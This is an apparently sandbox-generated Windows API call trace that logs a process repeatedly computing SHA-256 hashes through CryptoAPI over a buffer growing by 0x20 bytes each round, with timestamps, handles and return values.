	[0118.447] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a92b8
	[0118.447] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a92b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a92b8, pdwDataLen=0x129364) returned 1
	[0118.447] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.447] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.447] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.447] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.447] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0118.447] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a92e0
	[0118.447] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a92e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a92e0, pdwDataLen=0x129364) returned 1
	[0118.447] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.447] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.447] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.448] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.448] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0118.448] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9308
	[0118.448] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9308, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9308, pdwDataLen=0x129364) returned 1
	[0118.448] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.448] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.448] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.448] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.448] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0118.448] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9330
	[0118.448] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9330, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9330, pdwDataLen=0x129364) returned 1
	[0118.448] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.448] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.448] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.449] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.449] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0118.449] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9358
	[0118.449] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9358, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9358, pdwDataLen=0x129364) returned 1
	[0118.449] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.449] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.449] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.449] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.449] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0118.449] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9380
	[0118.449] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9380, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9380, pdwDataLen=0x129364) returned 1
	[0118.449] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.449] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.449] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.450] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.450] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0118.450] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a93a8
	[0118.450] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a93a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a93a8, pdwDataLen=0x129364) returned 1
	[0118.450] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.450] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.450] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.450] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.450] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0118.450] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a93d0
	[0118.450] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a93d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a93d0, pdwDataLen=0x129364) returned 1
	[0118.450] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.450] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.450] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.451] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.451] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0118.451] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a93f8
	[0118.451] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a93f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a93f8, pdwDataLen=0x129364) returned 1
	[0118.451] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.451] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.451] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.451] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.451] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0118.451] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9420
	[0118.452] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9420, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9420, pdwDataLen=0x129364) returned 1
	[0118.452] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.452] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.452] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.452] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.452] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0118.452] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9448
	[0118.452] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9448, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9448, pdwDataLen=0x129364) returned 1
	[0118.452] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.452] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.452] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.452] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.452] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0118.452] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9470
	[0118.453] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9470, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9470, pdwDataLen=0x129364) returned 1
	[0118.453] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.453] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.453] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.453] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.453] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0118.453] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9498
	[0118.453] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9498, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9498, pdwDataLen=0x129364) returned 1
	[0118.453] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.453] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.453] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.453] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.453] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0118.453] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a94c0
	[0118.454] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a94c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a94c0, pdwDataLen=0x129364) returned 1
	[0118.454] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.454] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.454] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.454] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.454] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0118.454] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a94e8
	[0118.454] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a94e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a94e8, pdwDataLen=0x129364) returned 1
	[0118.454] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.454] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.454] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.454] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.454] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0118.454] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9510
	[0118.454] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9510, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9510, pdwDataLen=0x129364) returned 1
	[0118.455] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.455] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.455] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.455] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.455] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0118.455] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9538
	[0118.455] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9538, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9538, pdwDataLen=0x129364) returned 1
	[0118.455] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.455] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.455] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.455] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.455] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0118.455] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9560
	[0118.455] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9560, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9560, pdwDataLen=0x129364) returned 1
	[0118.455] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.456] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.456] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.456] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.456] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0118.456] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9588
	[0118.456] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9588, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9588, pdwDataLen=0x129364) returned 1
	[0118.456] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.456] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.456] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.456] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.456] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0118.456] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a95b0
	[0118.456] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a95b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a95b0, pdwDataLen=0x129364) returned 1
	[0118.456] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.456] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.457] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.457] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.457] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0118.457] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a95d8
	[0118.457] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a95d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a95d8, pdwDataLen=0x129364) returned 1
	[0118.457] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.457] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.457] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.457] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.457] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0118.457] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9600
	[0118.457] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9600, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9600, pdwDataLen=0x129364) returned 1
	[0118.457] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.457] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.458] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.458] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.458] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0118.458] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9628
	[0118.458] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9628, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9628, pdwDataLen=0x129364) returned 1
	[0118.458] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.458] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.458] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.458] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.458] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0118.458] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9650
	[0118.458] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9650, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9650, pdwDataLen=0x129364) returned 1
	[0118.458] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.458] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.458] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.459] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.459] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0118.459] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9678
	[0118.459] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9678, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9678, pdwDataLen=0x129364) returned 1
	[0118.459] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.459] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.459] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.459] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.459] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0118.459] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a96a0
	[0118.459] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a96a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a96a0, pdwDataLen=0x129364) returned 1
	[0118.459] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.459] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.459] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.460] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.460] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x540, dwFlags=0x0) returned 1
